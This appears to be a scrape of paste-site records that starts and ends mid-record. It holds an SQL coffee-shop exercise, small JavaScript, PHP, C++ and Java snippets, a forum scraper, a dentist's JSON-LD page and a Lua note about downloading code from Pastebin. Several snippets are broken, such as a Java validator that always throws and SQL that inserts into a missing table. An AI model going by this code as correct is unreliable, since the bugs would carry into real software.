CHAR(6), + Nama_minuman VARCHAR(50) NOT NULL, + Harga_minuman FLOAT(2) NOT NULL, + PRIMARY KEY `Menu_minuman_PK` (ID_minuman) + ); + +CREATE TABLE + Telepon ( + No_telp_pegawai VARCHAR(15), + Pegawai_NIK CHAR(16), + PRIMARY KEY `Telepon_PK` (No_telp_pegawai), + FOREIGN KEY `Telepon_Pegawai_FK` (Pegawai_NIK) REFERENCES Pegawai(NIK) + ); + +CREATE TABLE + Transaksi ( + ID_transaksi CHAR(10), + Tanggal_transaksi DATE NOT NULL, + Metode_pembayaran VARCHAR(15) NOT NULL, + Customer_ID_customer CHAR(6), + Pegawai_NIK CHAR(16), + PRIMARY KEY `Transaksi_PK` (ID_Transaksi), + FOREIGN KEY `Transaksi_Customer_FK` (Customer_ID_customer) REFERENCES Customer(ID_customer), + FOREIGN KEY `Transaksi_Pegawai_FK` (Pegawai_NIK) REFERENCES Pegawai(NIK) + ); + +CREATE TABLE + Transaksi_minuman ( + TM_Menu_minuman_ID CHAR(6), + TM_Transaksi_ID CHAR(10), + Jumlah_cup INT NOT NULL, + PRIMARY KEY `Transaksi_minuman_PK` ( + TM_Menu_minuman_ID, + TM_Transaksi_ID + ), + FOREIGN KEY `TM_ID_Menu_minuman_FK` (TM_Menu_minuman_ID) REFERENCES Menu_minuman(ID_minuman), + FOREIGN KEY `TM_ID_Transaksi_FK` (TM_Transaksi_ID) REFERENCES Transaksi(ID_transaksi) + ) + +-- 2 +CREATE TABLE + Membership ( + ID_membership CHAR(6), + No_telepon_customer VARCHAR(15) NOT NULL, + Alamat_customer VARCHAR(100) NOT NULL, + Tanggal_pembuatan_kartu_membership DATE NOT NULL, + Tanggal_kedaluwarsa_kartu_membership DATE, + Total_poin INT NOT NULL, + Customer_id_customer CHAR(6) + ) -- 2A +ALTER TABLE Membership +ADD PRIMARY KEY (ID_membership); + +-- 2B +ALTER TABLE Membership +ADD + FOREIGN KEY (Customer_id_customer) REFERENCES Customer(ID_customer) ON DELETE RESTRICT ON UPDATE CASCADE; + +-- 2C +ALTER TABLE Membership +ADD + CONSTRAINT T_id_customer FOREIGN KEY (Customer_id_customer) REFERENCES Customer(ID_customer) ON DELETE CASCADE ON UPDATE CASCADE; + +-- 2D +ALTER TABLE + Membership MODIFY COLUMN tanggal_pembuatan_kartu_membership DATE DEFAULT CURRENT_DATE NOT NULL; + +-- 2E +ALTER TABLE Membership +ADD + CONSTRAINT Total_poin CHECK (total_poin >= 0); + +-- 2F +ALTER TABLE + Membership MODIFY COLUMN Alamat_customer VARCHAR(150) NOT NULL; + +-- 3 +DROP TABLE Telepon; +ALTER TABLE Pegawai ADD COLUMN Telepon VARCHAR(15) NOT NULL; + +-- 4 +INSERT INTO + Customer (ID_customer, Nama_customer) +VALUES ('CTR001', 'Budi Santoso'), ('CTR002', 'Sisil Triana'), ('CTR003', 'Davi Liam'), ('CTRo04', 'Sutris Ten An'), ('CTR005', 'Hendra Asto'); + +INSERT INTO + Membership ( + ID_membership, + No_telepon_customer, + Alamat_customer, + tanggal_pembuatan_kartu_membership, + Tanggal_kedaluwarsa_kartu_membership, + Total_poin, + Customer_id_customer + ) +VALUES ( + 'MBR001', + '08123456789', + 'Jl. Imam Bonjol', + '2023-10-24', + '2023-11-30', + 0, + 'CTR001' + ), ( + 'MBR002', + '0812345678', + 'Jl. Kelinci', + '2023-10-24', + '2023-11-30', + 3, + 'CTR002' + ), ( + 'MBR003', + '081234567890', + 'Jl. Abah Ojak', + '2023-10-25', + '2023-12-01', + 2, + 'CTR003' + ), ( + 'MBR004', + '08987654321', + 'Jl. Kenangan', + '2023-10-26', + '2023-12-02', + 6, + 'CTR005' + ); + +INSERT INTO + Pegawai ( + NIK, + Nama_pegawai, + Jenis_kelamin, + Email, + Umur, + Telepon + ) +VALUES ( + '123456789012345', + 'Naufal Raf', + 'Laki-Laki', + '', + 19, + '62123456789' + ), ( + '2345678901234561', + 'Surinala', + 'Perempuan', + '', + 24, + '621234567890' + ), ( + '3456789012345612', + 'Ben John', + 'Laki-Laki', + '', + 22, + '6212345678' + ); + +INSERT INTO + Transaksi ( + ID_transaksi, + Tanggal_transaksi, + Metode_pembayaran, + Pegawai_NIK, + Customer_ID_customer + ) +VALUES ( + 'TRX0000001', + '2023-10-01', + 'Kartu kredit', + '2345678901234561', + 'CTR002' + ), ( + 'TRX0000002', + '2023-10-03', + 'Transfer bank', + '3456789012345612', + 'CTRo04' + ), ( + 'TRX0000003', + '2023-10-05', + 'Tunai', + '3456789012345612', + 'CTR001' + ), ( + 'TRX0000004', + '2023-10-15', + 'Kartu debit', + '1234567890123456', + 'CTR003' + ), ( + 'TRX0000005', + '2023-10-15', + 'E-wallet', + '1234567890123456', + 'CTRo04' + ), ( + 'TRX0000006', + '2023-10-21', + 'Tunai', + '2345678901234561', + 'CTR001' + ); + +INSERT INTO + Menu ( + ID_minuman, + Nama_minuman, + Harga_minuman + ) +VALUES ( + 'MNM001', + 'Expresso', + 'Rp18.000' + ), ( + 'MNM002', + 'Cappuccino', + 'Rp20.000' + ), ('MNM003', 'Latte', 'Rp21.000'), ( + 'MNM004', + 'Americano', + 'Rp19.000' + ), ('MNM005', 'Mocha', 'Rp22.000'), ( + 'MNM006', + 'Macchiato', + 'Rp23.000' + ), ( + 'MNM007', + 'Cold Brew', + 'Rp21.000' + ), ( + 'MNM008', + 'Iced Coffee', + 'Rp18.000' + ), ( + 'MNM009', + 'Affogato', + 'Rp23.000' + ), ( + 'MNM010', + 'Coffee Frappe', + 'Rp22.000' + ); + +INSERT INTO + Transaksi_minuman ( + TM_Transaksi_ID, + TM_Menu_minuman_ID, + Jumlah_cup + ) +VALUES ('TRX0000005', 'MNM006', 2), ('TRX0000001', 'MNM010', 1), ('TRX0000002', 'MNM005', 1), ('TRX0000005', 'MNM009', 1), ('TRX0000003', 'MNM001', 3), ('TRX0000006', 'MNM003', 2), ('TRX0000004', 'MNM004', 2), ('TRX0000004', 'MNM010', 1), ('TRX0000002', 'MNM003', 2), ('TRX0000001', 'MNM007', 1), ('TRX0000005', 'MNM001', 1), ('TRX0000003', 'MNM003', 1); + +-- 5 +INSERT INTO + Transaksi ( + ID_transaksi, + Tanggal_transaksi, + Metode_pembayaran, + Pegawai_NIK, + Customer_ID_customer + ) +VALUES ( + 'TRX0000007', + '2023-10-03', + 'Transfer bank', + '2345678901234561', + 'CTRo04' + ); + +INSERT INTO + transaksi_minuman ( + TM_Transaksi_ID, + TM_Menu_minuman_ID, + Jumlah_cup + ) +VALUES ('TRX0000007', 'MNM005', 1); + +-- 6 +INSERT INTO + Pegawai (NIK, Nama_pegawai, Umur) +VALUES ( + '1111222233334444', + ""Maimunah"", + 25 + ); + +-- 7 +UPDATE Transaksi +SET + Customer_ID_customer = ""CTR004"" +WHERE + Customer_ID_customer = ""CTRo04""; + +-- 8 +UPDATE Pegawai +SET + Jenis_kelamin = ""P"", + Telepon = 621234567, + Email = """" +WHERE NIK = ""1111222233334444""; + +-- 9 +UPDATE Membership +SET total_poin = 0 +WHERE + DATE_FORMAT( + tanggal_kedaluwarsa_kartu_membership, + '%Y-%m' + ) < '2023-12'; + +-- 10 +DELETE FROM Membership; + +-- 11 +DELETE FROM Pegawai WHERE Nama_pegawai = ""Maimunah"";" +LKqGeQUB,Rainbow BonziBUDDY For BonziWORLD Script Inspect Element,J_y,JavaScript,Thursday 2nd of November 2023 08:36:24 AM CDT,"var hue = 0; + +alert(""--ACID BONZI ACTIVATED--""); +setInterval(() => { + hue++; + $(""#bonzi_canvas"").css({""filter"": ""hue-rotate("" + hue + ""deg)""}); +}); +/////////// +// MADE BY J_Y +//" +hGfDxbCB,Alternative approach to ban truck notifications,jedtony,PHP,Thursday 2nd of November 2023 08:23:40 AM CDT,"public function notifyCustomerOfTruckBan(string $reason): bool { + $truckIds = $this->truck_info->pluck('id')->toArray(); + + $facilityBookingTrucks = FacilityBookingTruck::with('facilitybooking.admin') + ->whereIn('truck_id', $truckIds) + ->where('truck_status', '!=', 'Left-Terminal') + ->latest() + ->get(); + + $notifications = []; + + foreach ($this->truck_info as $info) { + $facilityBookingTruck = $facilityBookingTrucks->where('truck_id', $info->id)->first(); + + if ($facilityBookingTruck) { + $usermessage = 'Your Truck ' . $info->plate_number . ' has been Disabled for ' . $this->ban_duration . ' Days because of the following reason
Reason: ' . $reason; + $notifications[] = [ + 'user' => $info->customer, + 'message' => $usermessage + ]; + + if ($facilityBookingTruck->facilitybooking && $facilityBookingTruck->facilitybooking->admin) { + $notifications[] = [ + 'user' => $facilityBookingTruck->facilitybooking->admin, + 'message' => $usermessage + ]; + } + } + } + + // Notify customers and admins + foreach ($notifications as $notification) { + $notification['user']->notify(new UserNotification( + $notification['user']->name, + 'customer/trucks?id=' . $info->id, + $notification['message'], + 'Disabled Truck Notification', + 'default' + )); + } + + return true; +}" +cYkNjMAM,Koikatsu List Scraper V1.2,Skelun,JavaScript,Thursday 2nd of November 2023 08:22:10 AM CDT,"/* -------------------------------------------------------------------- +-- Transforms embedded links into actual Hyperlinks +----------------------------------------------------------------------- */ + +function createHyperlink() { + var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet(); + + // Get the selected range + var range = sheet.getActiveRange(); + var richTextValues = range.getRichTextValues(); + + for (var i = 0; i < richTextValues.length; i++) { + for (var j = 0; j < richTextValues[0].length; j++) { + var textValue = richTextValues[i][j].getText(); + var link = richTextValues[i][j].getLinkUrl(); + + if (link) { + // Create a hyperlink formula + var formula = '=HYPERLINK(""' + link + '"", ""Here"")'; + + // Set the formula in the cell + sheet.getRange(range.getRow() + i, range.getColumn() + j).setFormula(formula); + } + } + } +} + +/* -------------------------------------------------------------------- +-- MOON RATING +----------------------------------------------------------------------- +-- I'm using this because it was the easier way +-- to simulate rating stars. +----------------------------------------------------------------------- */ + +function moonRating(number) { + // Is it a number? + if (!isNaN(number)) { + var votes; + + // Is it an interger? + if (number % 1 === 0) { + votes=""🌕"".repeat(number); + votes+=""🌑"".repeat(5-number); + + // Or is it a float? + } else { + let n = Math.floor(number); + votes=""🌕"".repeat(n); + votes+=""🌗""; + votes+=""🌑"".repeat(4-n); + } + return votes; + } else { + // If no votes + return ""------"" + } +} + +/* -------------------------------------------------------------------- +-- Scraping data using Cheerio library +-- ( +-- Script ID: 1ReeQ6WO8kKNxoaA_O0XEQ589cIrRvEBA9qcWpNqdOP17i47u6N9M5Xh0 +----------------------------------------------------------------------- */ + +// Cheerio method to scrape +function getContent(url) { + return UrlFetchApp.fetch(url).getContentText() +} + +/* -------------------------------------------------------------------- +-- Actual scrape function +----------------------------------------------------------------------- */ + +function scrapeData(force) { + + // Selects the active sheet + var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet(); + + // Get selected cells + var selectedRange = sheet.getActiveRange(); + + // Get the values from the selected cells + var selectedValues = selectedRange.getRichTextValues(); + + // Iterate through cells + for (var i = 0; i < selectedValues.length; i++) { + + // It assumes the URLs are in the first column of the selected column + var urlFromLink = selectedValues[i][0].getLinkUrl(); + var urlFromCellValue = selectedValues[i][0].getText(); // Get text value from the cell + + // Check if there is a link URL, and use it if available; otherwise, use the URL from the cell value + var url = urlFromLink ? urlFromLink : urlFromCellValue; + + // If the value is not empty... + if (url && isValidURL(url)) { + + // Grabs the HTML data + var content = getContent(url); + + // Parses the HTML data + var $ = Cheerio.load(content); + + /* -------------------------------------------------------------------- + -- [TITLE] + -------------------------------------------------------------------- */ + var threadTitle = $('h1.p-title-value'); + + var rawTitle = threadTitle.contents().filter(function() { + return this.type === 'text'; + }).text(); + + var titleREGEX = /(.+?)\s+\[(.+?)\]\s+\[(.+?)\]/.exec(rawTitle); + + var title = titleREGEX[1]; + var version = titleREGEX[2]; + + /* -------------------------------------------------------------------- + -- [STATUS] (ACTIVE - ABANDONED - ONHOLD) + -------------------------------------------------------------------- */ + // Default status + var status = 'Active'; + + // Search for ""Abandoned"" or ""Onhold"" + threadTitle.find('span').each(function() { + var spanText = $(this).text(); + if (['Completed','Abandoned','Onhold'].includes(spanText)) { + status = spanText; + return false; + } + }); + + /* -------------------------------------------------------------------- + -- [ENGINE] + ----------------------------------------------------------------------- */ + // If there's no engine info, it returns ""unknown"" + var engine = 'Unknown'; + + // Checks if there's one of these strings + threadTitle.find('span').each(function() { + var spanText = $(this).text(); + if (['ADRIFT','Flash','Java','Others','QSP','RAGS','RPGM',""Ren'Py"",'Tads','Unity','Unreal Engine','WebGL','Wolf RPG','HTML'].includes(spanText)) { + engine = spanText; + return false; // Stop searching once a match is found + } + }); + + /* -------------------------------------------------------------------- + -- [TAGS] + ----------------------------------------------------------------------- */ + // Selects the element containing the tags + var tagList = $('span.js-tagList'); + + // Grabs the tags and separate them by comma + var tags = tagList.find('a.tagItem').map(function() { + return $(this).text(); + }).get().join(', '); + + /* -------------------------------------------------------------------- + -- GAMEPLAY + ----------------------------------------------------------------------- */ + var gameplay; + + // Assumes the [Gameplay] type by using the tags + switch (true) { + case tags.includes('sandbox'): + gameplay = 'Sandbox'; + break; + case tags.includes('turn based combat'): + gameplay = 'TBC'; + break; + case tags.includes('management'): + gameplay = 'Management'; + break; + case tags.includes('simulator'): + gameplay = 'Simulator'; + break; + case tags.includes('rpg'): + gameplay = 'RPG'; + break; + default: + gameplay = 'Visual Novel'; + } + + /* -------------------------------------------------------------------- + -- - Thread [Start] Date + ----------------------------------------------------------------------- */ + + // Find all instances of a.u-concealed + var concealedLinks = $('a.u-concealed'); + + // Check if there is a second instance + if (concealedLinks.length > 1) { + // Get the second instance's time element + var secondTimeElement = concealedLinks.eq(1).find('time.u-dt'); + + // Check if the time element exists within the second instance + if (secondTimeElement.length > 0) { + // Extract the datetime property + var start = secondTimeElement.attr('datetime'); + start = start.split('T')[0] + + // Now, the 'datetime' variable contains the value of the datetime property + // You can use it as needed in your code + Logger.log(start); + } else { + Logger.log(""Time element not found in the second instance of a.u-concealed.""); + } + } else { + Logger.log(""There is no second instance of a.u-concealed.""); + } + + /* -------------------------------------------------------------------- + -- EXTRA INFORMATION + ----------------------------------------------------------------------- + -- - Thread [Updated] Date + -- - [Release] Date + -- - [Dev] name + -- - [Censored] + ----------------------------------------------------------------------- */ + // Selects the first message body (which is the one containing the game info) + var articleText = $('article.message-body').first().text(); + + // Uses regular expressions to match and capture the information + // When it was updated + var updatedREGEX = /Thread Updated: ([^\s]+)/.exec(articleText); + // When it was released + var releaseREGEX = /Release Date: ([^\s]+)/.exec(articleText); + // Who is the dev + var devREGEX = /Developer: ([^\s]+)/.exec(articleText); + // It is censored? + var censoredREGEX = /Censored: (.+?)(?=\n|\r|\r\n)/.exec(articleText); + + // Extract the captured values or provide default values if not found + var updated = updatedREGEX ? updatedREGEX[1] : ""Not found""; + var release = releaseREGEX ? releaseREGEX[1] : ""Not found""; + var dev = devREGEX ? devREGEX[1] : ""Not found""; + var censored = censoredREGEX ? censoredREGEX[1] : ""Not found""; + + /* -------------------------------------------------------------------- + -- [RATING] & [VOTES] + ----------------------------------------------------------------------- */ + // Grabs the JSON generated by F95 forum + var jsonInfo = $('script[type=""application/ld+json""]').last(); + + // Uses regular expression to match and caputre the information + var ratingREGEX = /""ratingValue"": ""(\d+(?:\.\d+)?)""/.exec(jsonInfo); + var votesREGEX = /""ratingCount"": ""(\d+)""/.exec(jsonInfo); + + // Extract the captured values or provide default values if not found + var rating = ratingREGEX ? ratingREGEX[1] : ""No Rating""; + var votes = votesREGEX ? votesREGEX[1] : ""0""; + + /* -------------------------------------------------------------------- + -- LAST UPDATE CHECK + -- -------------------------------------------------------------------- + -- It will ignore the game if it was updated less than 30 days ago + ----------------------------------------------------------------------- */ + + // Gets today's date + var today = new Date(); + + // Parses the update & release info + var updatedDate = new Date(updated); + var releaseDate = new Date(release); + + // Subtracts both dates to get days gap + var daysSinceLastUpdate = Math.floor((today - updatedDate) / (1000 * 60 * 60 * 24)); + var daysSinceRelease = Math.floor((today - releaseDate) / (1000 * 60 * 60 * 24)); + + if (force === true || daysSinceRelease < 30 || daysSinceLastUpdate > 30) { + + /* -------------------------------------------------------------------- + -- OUTPUTS THE VALUE INTO DIFFERENT CELLS + ----------------------------------------------------------------------- */ + + // Write the scraped data to the same row + var outputRow = selectedRange.getRow() + i; + + // Write the scraped data to adjacent columns + var outputColumn = selectedRange.getColumn() + 1; + + // All values that will be written + var values = [[ + rawTitle, + title, + version, + status, + engine, + gameplay, + tags, + moonRating(rating), + votes, + updated, + release, + start, + dev, + censored + ]]; + + // Where it will be written + sheet.getRange(outputRow, outputColumn, 1, values[0].length).setValues(values); + } + + } + + } + +} + +/* -------------------------------------------------------------------- +-- IGNORE DATE RESTRICTION +----------------------------------------------------------------------- */ + +function forceScrapeData() { + scrapeData(true); +} + +/* -------------------------------------------------------------------- +-- CHECK IF THE STRING IS A VALID URL +----------------------------------------------------------------------- */ +function isValidURL(str) { + var pattern = new RegExp('^(https?:\\/\\/)?'+ // protocol + '((([a-z\\d]([a-z\\d-]*[a-z\\d])*)\\.)+[a-z]{2,}|' + // domain name + '((\\d{1,3}\\.){3}\\d{1,3}))' + // OR an IP Address + '(\\:\\d+)?(\\/[-a-z\\d%_.~+]*)*' + // port and path + '(\\?[;&a-z\\d%_.~+=-]*)?' + // query string + '(\\#[-a-z\\d_]*)?$', 'i'); // fragment locator + return pattern.test(str); +} + +/* -------------------------------------------------------------------- +-- CREATES AN EXTRA MENU OPTION +----------------------------------------------------------------------- */ + +function onOpen() { + var ui = SpreadsheetApp.getUi(); + ui.createMenu('Extra Functions') + .addItem('Scrape Data', 'scrapeData') + .addItem('Force Scrape', 'forceScrapeData') + .addItem('Create Hyperlink','createHyperlink') + .addToUi(); +}" +RcBNtUVR,39. Combination Sum LeetCode,yarin0600,C++,Thursday 2nd of November 2023 08:15:26 AM CDT,"std::vector> combinationSum(std::vector &candidates, int target) +{ + std::vector> combinations; + std::vector currentCombination; + backtrack(candidates, combinations, currentCombination, 0, target); + return combinations; +} + +void backtrack(std::vector &candidates, std::vector> &combinations, + std::vector ¤tCombination, + int idx, int currentValue) +{ + if (currentValue < 0) + return; + + else if (currentValue == 0) + { + combinations.push_back(currentCombination); + return; + } + + for (int i = idx; i < candidates.size(); ++i) + { + currentCombination.push_back(candidates[i]); + backtrack(candidates, combinations, currentCombination, i, currentValue - candidates[i]); + currentCombination.pop_back(); + } +}" +SqQe1thn,Untitled,HeatedDZN,Lua,Thursday 2nd of November 2023 08:06:43 AM CDT,"-- Delete the file ""Test"" if it exists""delete Test"") + +-- Download a file from Pastebin""pastebin get 9g440Xrn Test"") +" +YbEHMBti,Untitled,soyl,Java,Thursday 2nd of November 2023 08:03:41 AM CDT,"import UI.IdGenerator; +import UI.model.Film; +import lombok.extern.slf4j.Slf4j; +import org.springframework.web.bind.annotation.*; + +import java.time.LocalDate; +import java.util.ArrayList; +import java.util.List; + +@Slf4j +@RestController +@RequestMapping(""/film"") +public class FilmController { + List films = new ArrayList<>(); + IdGenerator idGenerator = new IdGenerator(); + + + @PostMapping + public Film addFilm(@RequestBody Film film) throws ValidationException { + checkBody(film); + film.setId(idGenerator.generateId()); + films.add(film); + return film; + } + + @PutMapping(""/{id}"") + public void updateFilm(@PathVariable int id, @RequestBody Film film) throws ValidationException { + checkBody(film); + films.set(id,film); + } + + @GetMapping + public List getAllFilms() { + return films; + } + + + public static class ValidationException extends Exception { + public ValidationException(String message) { + super(message); + } + } + + private void checkBody(@RequestBody Film film) throws ValidationException { + if (film.getName().isEmpty()) { + throw new ValidationException(""Название фильма не может быть пустым""); + } + + else if (film.getDescription().length() > 200) { + throw new ValidationException(""Описание фильма не может превышать 200 символов""); + } + + else if (film.getReleaseDate().isBefore(LocalDate.of(1895, 12, 28))) { + throw new ValidationException(""Дата релиза не может быть раньше 28 декабря 1895 года""); + } + + else if (film.getDuration() <= 0) { + throw new ValidationException(""Продолжительность фильма должна быть положительной""); + } + else { + throw new ValidationException(""1""); + } + } + + +} +" +yaHCDvUj,New,jaideep06,JSON,Thursday 2nd of November 2023 07:32:15 AM CDT,"{ + ""@context"": """", + ""@graph"": { + ""@type"": ""Dentist"", + ""name"": ""Cambridge Dentist Martindale Dental"", + ""description"": ""Our Cambridge dentist location offers general dentistry services for the whole family. Let our friendly, caring and experienced team take care of your smile."", + ""address"": { + ""@type"": ""PostalAddress"", + ""streetAddress"": ""500 Can-Amera Pkwy"", + ""postalCode"": ""N1T 0A2"", + ""addressLocality"": ""Cambridge"", + ""addressRegion"": ""Ontario"", + ""addressCountry"": ""Canada"" + }, + ""telephone"": ""+12262424985"", + ""url"": """", + ""image"": """", + ""video"": """", + ""logo"": """", + ""openingHours"": [ + ""Mo 09:00-20:00"", + ""Tu 09:00-19:00"", + ""We 09:00-19:00"", + ""Th 09:00-20:00"", + ""Sa 09:00-15:00"" + ], + ""aggregateRating"": { + ""@type"": ""AggregateRating"", + ""ratingValue"": 4.9, + ""reviewCount"": 229 + }, + ""review"": [ + { + ""@type"": ""Review"", + ""author"": ""Sanskruthi Badrinath"", + ""datePublished"": ""2023-10-17"", + ""description"": ""I just happened to call the clinic for a regular cleaning and was immediately offered the closest appointment. Honestly, I had a very positive experience at the clinic. No long wait times, hygienic, great experience with the staff!I would 100% recommend to anyone who is looking for a dental clinic in the KWC area!"", + ""reviewRating"": { + ""@type"": ""Rating"", + ""bestRating"": 5, + ""ratingValue"": 5, + ""worstRating"": 1 + } + }, + { + ""@type"": ""Review"", + ""author"": ""Jennifer Woodgett"", + ""datePublished"": ""2023-08-15"", + ""description"": ""My family have been coming here for almost 10 years. Dr Asi is awesome. Gentle and kind and the reason we drive here from across town, even after we moved houses."", + ""reviewRating"": { + ""@type"": ""Rating"", + ""bestRating"": 5, + ""ratingValue"": 5, + ""worstRating"": 1 + } + }, + { + ""@type"": ""Review"", + ""author"": ""amandeep kaur"", + ""datePublished"": ""2023-05-31"", + ""description"": ""It was my first time getting cleaning done. Ellie was wonderful. She was so easy to talk, very polite and had an appropriate answer and solution to my every problem."", + ""reviewRating"": { + ""@type"": ""Rating"", + ""bestRating"": 5, + ""ratingValue"": 5, + ""worstRating"": 1 + } + }, + { + ""@type"": ""Review"", + ""author"": ""Lorraine Scheonfeld"", + ""datePublished"": ""2023-08-30"", + ""description"": ""I would not even consider going to any other Dentistry! All staff are friendly and professional! They answer your questions and help in any way to make you comfortable and at ease with any choices you have to make! I have been coming here for years, and I have always been a satisfied client! We also share laughs too! Thank you to everyone at Canamera for caring and your excellent dental work!!"", + ""reviewRating"": { + ""@type"": ""Rating"", + ""bestRating"": 5, + ""ratingValue"": 5, + ""worstRating"": 1 + } + }, + { + ""@type"": ""Review"", + ""author"": ""Nikki"", + ""datePublished"": ""2023-08-01"", + ""description"": ""I have been to quite a few dentists because I’ve moved a lot and have had many bad experiences. Canamera dentistry is by far the best office I have ever been to. I’ve had multiple appointments with Dr. Asi who is super friendly, caring, and informative. I love how he tells me what he is about to do so I know what to expect and makes sure I feel comfortable. This past appointment was with Dr. Bordeianu, originally I was nervous because I felt lucky for finally finding one dentist I liked. I’m happy to report that She is just as comforting and accommodating to my dental needs! Really happy with the entire practice! This is the perfect example of creating a no-fear dental office that cares about the patients and really listens!"", + ""reviewRating"": { + ""@type"": ""Rating"", + ""bestRating"": 5, + ""ratingValue"": 5, + ""worstRating"": 1 + } + } + ], + ""hasMap"": """", + ""geo"": { + ""@type"": ""GeoCoordinates"", + ""latitude"": 43.40576, + ""longitude"": -80.28544 + }, + ""makesOffer"": [ + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Dental Exams & Check-ups"", + ""description"": ""A thorough inspection of the oral cavity to evaluate dental well-being and identify possible dental issues."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Teeth Whitening"", + ""description"": ""A procedure designed to return teeth to their original hue or brighten them to a shade beyond their natural color."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Dental Veneers"", + ""description"": ""Slim porcelain veneers that are affixed to the front surfaces of teeth to improve their aesthetic look."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Dental Implants"", + ""description"": ""Synthetic tooth roots implanted into the jawbone to support a prosthetic tooth or dental bridge."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Family Dentistry"", + ""description"": ""Family-oriented dental services designed to provide each member with the best possible oral health care."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Children’s Dentistry"", + ""description"": ""Targeted dental care dedicated to maintaining and treating the oral health of children from infancy to adolescence."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Oral Surgery"", + ""description"": ""Surgical procedures pertaining to the oral cavity and jawbones, encompassing tooth removal and structural adjustments."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Invisalign Clear Aligners"", + ""description"": ""Customized clear aligners designed for realigning teeth, offering an inconspicuous alternative to conventional braces."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Wisdom Tooth Removal"", + ""description"": ""Secure and expert extraction of wisdom teeth to prevent discomfort or potential dental issues."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Dental Crowns"", + ""description"": ""Tooth-like coverings fitted onto teeth to reinstate their form, dimensions, robustness, and aesthetic appeal."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Dental Bridges"", + ""description"": ""Dental prosthetics designed to fill the gap of one or several lost teeth by connecting a false tooth to the neighboring teeth or to dental implants."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Sleep Dentistry"", + ""description"": ""The application of medication, nitrous oxide, or anesthesia to assist patients in achieving a calm state during dental treatments, often known as sedation dentistry."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Dental Fillings"", + ""description"": ""Restoration of damaged teeth to their original functionality and structure using fillings to repair cavities or fractured sections."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Orthodontics"", + ""description"": ""Targeted orthodontic therapy that employs braces and additional devices to adjust misaligned teeth."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Partials and Full Dentures"", + ""description"": ""Removable prosthetic devices designed to substitute for absent teeth; they can be easily inserted and removed from the mouth."" + } + }, + { + ""@type"": ""Offer"", + ""itemOffered"": { + ""@type"": ""Service"", + ""name"": ""Root Canal Therapy"", + ""description"": ""A treatment to repair and save a tooth that is badly decayed or infected."" + } + } + ], + ""mainEntity"": [ + { + ""@type"": ""Question"", + ""name"": ""What is the location of your Cambridge dentist office?"", + ""acceptedAnswer"": { + ""@type"": ""Answer"", + ""text"": ""Our Cambridge clinic is conveniently located at the intersection of Can-Amera Pkwy and Baintree Way. You can find our office in the outdoor mall, right beside the Hasty Market."" + } + }, + { + ""@type"": ""Question"", + ""name"": ""Is there parking available at your location?"", + ""acceptedAnswer"": { + ""@type"": ""Answer"", + ""text"": ""Yes, there is dedicated parking for Canamera Dentistry right in front of our door."" + } + }, + { + ""@type"": ""Question"", + ""name"": ""Does the Cambridge clinic offer Children's Dentistry?"", + ""acceptedAnswer"": { + ""@type"": ""Answer"", + ""text"": ""Dr. Anca Bordeianu and her team have a welath of experienced treating children and helping them feel relaxed during every visit."" + } + }, + { + ""@type"": ""Question"", + ""name"": ""Does Canamera Dentistry in Cambridge offer insurance coverage?"", + ""acceptedAnswer"": { + ""@type"": ""Answer"", + ""text"": ""Yes, our clinic provides direct insurance billing."" + } + }, + { + ""@type"": ""Question"", + ""name"": ""Do you offer financing?"", + ""acceptedAnswer"": { + ""@type"": ""Answer"", + ""text"": ""Our Hamilton clinic offers easy payment and financing options to qualified patients."" + } + }, + { + ""@type"": ""Question"", + ""name"": ""Do you accept walk-in appointments?"", + ""acceptedAnswer"": { + ""@type"": ""Answer"", + ""text"": ""Yes, of course! Our Cambridge office welcomes all new patients, whether that is through a scheduled appointment or a simple walk-in introduction."" + } + } + ], + ""keywords"": ""Cambridge dentist, dentist in Cambridge, Cambridge dental office"", + ""sameAs"": [ + """", + """", + """" + ], + ""parentOrganization"": { + ""@type"": ""Dentist"", + ""name"": ""Martindale Dental"", + ""url"": """" + }, + ""contactPoint"": [ + { + ""@type"": ""ContactPoint"", + ""telephone"": ""+12262424985"", + ""contactType"": ""customer service"" + }, + { + ""@type"": ""ContactPoint"", + ""telephone"": ""+12262424985"", + ""contactType"": ""appointments"" + }, + { + ""@type"": ""ContactPoint"", + ""email"": """", + ""contactType"": ""appointments"" + }, + { + ""@type"": ""ContactPoint"", + ""email"": """", + ""contactType"": ""customer service"" + } + ], + ""areaServed"": { + ""@type"": ""AdministrativeArea"", + ""name"": ""Cambridge and surrounding areas"" + }, + ""acceptedPaymentMethod"": [ + ""Visa"", + ""MasterCard"", + ""AmericanExpress"", + ""Cash"", + ""Cheque"", + ""DirectInsuranceBilling"" + ] + } +}" +XtB6s5ST,04. Foreign Languages,Spocoman,C++,Thursday 2nd of November 2023 07:25:08 AM CDT,"#include + +using namespace std; + +int main() { + string country; + getline(cin, country); + + string language; + + if (country == ""England"" || country == ""USA"") { + language = ""English""; + } + else if (country == ""Spain"" || country == ""Argentina"" || country == ""Mexico"") { + language = ""Spanish""; + } + else { + language = ""unknown""; + } + + 